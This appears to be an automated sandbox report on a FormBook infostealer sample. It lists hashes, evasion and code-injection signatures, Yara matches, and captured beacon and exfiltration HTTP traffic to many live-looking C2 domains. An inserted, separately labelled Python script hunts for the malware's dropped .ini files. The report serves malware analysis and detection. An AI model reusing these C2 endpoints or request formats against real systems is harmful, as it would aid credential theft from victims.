Analysis Report R6o4qCis6s.exe

Overview

General Information

Sample Name: R6o4qCis6s.exe
Analysis ID: 287799
MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e
SHA1: e34056989f520736af44df68d869b71a4d4d695f
SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: R6o4qCis6s.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.heyidianzib.com/tln/ Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com Avira URL Cloud: Label: malware
Source: http://www.heyidianzib.com/tln/www.olisolution.com Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.glowtey.com Virustotal: Detection: 7%
Source: http://www.glowtey.com/tln/ Virustotal: Detection: 8%
Source: http://www.glowtey.com Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: R6o4qCis6s.exe Virustotal: Detection: 77%
Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: R6o4qCis6s.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 163864Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.cashflowtoday.net
Source: unknown HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.net/tln/www.themayoparty.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.cashflowtoday.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.com/tln/www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.creditcommoncents.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.com/tln/www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.daddaenterprises.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.net/tln/www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.ero-special.netReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.com/tln/www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.glowtey.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.com/tln/www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.heyidianzib.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.com/tln/www.heyidianzib.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.jgdesignco.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.com/tln/www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.keytoblogging.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.com/tln/www.jgdesignco.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.kjvrvg.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.com/tln/www.creditcommoncents.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.laesses.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.net/tln/v
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.montieri.netReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.com/tln/www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.olisolution.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.com/tln/www.laesses.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.onthejoblanguages.comReferer:
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digital/tln/www.saliwasims.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.proseo.digitalReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.com/tln/www.ero-special.net
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.saliwasims.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com/tln/
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.com/tln/www.glowtey.com
Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp String found in binary or memory: http://www.themayoparty.comReferer:
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000005.00000002.476037597.00000000001E8000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
Source: explorer.exe, 00000005.00000003.355707285.0000000005940000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00424C58
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A784 GetKeyboardState, 0_2_0043A784

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\explorer.exe Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
Source: C:\Windows\SysWOW64\explorer.exe Dropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogrv.ini
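The two dropped files above share one shape: an 8-character alphanumeric directory under the Roaming profile, containing .ini files whose name starts with the first three characters of that directory followed by "log" and two letters. The following hunt script is an added example, not part of this report or of any Joe Sandbox tooling; it generalises that shape to other hosts, which is an assumption, and it builds its own constructed sample tree (the two paths from this report plus decoys that must not match) so it runs offline.

```python
import re
import tempfile
from pathlib import Path

# Observed in this report: explorer.exe dropped
#   %APPDATA%\55R0B44T\55Rlogri.ini  and  %APPDATA%\55R0B44T\55Rlogrv.ini
# i.e. an 8-character alphanumeric directory whose first three characters
# prefix ".ini" files named <prefix>log<xx>.ini. Applying that shape to
# other infections is an assumption made here, not a statement of the report.
DIR_RE = re.compile(r"^[A-Z0-9]{8}$")
INI_RE = re.compile(r"^(?P<prefix>[A-Z0-9]{3})log[a-z]{2}\.ini$")


def find_formbook_staging(roaming: Path):
    """Return .ini files under `roaming` (the Roaming AppData folder) whose
    directory and file name match the staging shape seen in this report."""
    hits = []
    for d in sorted(p for p in roaming.iterdir() if p.is_dir()):
        if not DIR_RE.match(d.name):
            continue
        for f in sorted(d.iterdir()):
            m = INI_RE.match(f.name)
            if f.is_file() and m and m.group("prefix") == d.name[:3]:
                hits.append(f)
    return hits


def build_sample_tree(root: Path):
    """Constructed sample layout: the two paths from this report plus decoys
    that must not match (prefix/directory mismatch, 7-character directory,
    ordinary application data)."""
    for rel in (
        "55R0B44T/55Rlogri.ini",
        "55R0B44T/55Rlogrv.ini",
        "55R0B44T/ABClogri.ini",          # prefix does not match the directory
        "ABCDEFG/ABClogri.ini",           # directory is only 7 characters
        "Microsoft/Windows/Themes/x.ini",  # legitimate profile data
    ):
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(b"")


def demo():
    """Build the constructed tree in a temporary directory and return the
    matches as forward-slash paths relative to that directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return [h.relative_to(root).as_posix()
                for h in find_formbook_staging(root)]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. python hunt.py "%APPDATA%" on a live host
        for hit in find_formbook_staging(Path(sys.argv[1])):
            print(hit)
    else:
        print(demo())
```

The prefix check (file prefix must equal the first three characters of the directory name) is what keeps the rule from firing on every short-named .ini under Roaming; a hit still needs confirmation against the process tree, since the report attributes the drop to a hollowed explorer.exe rather than to the original sample.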
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
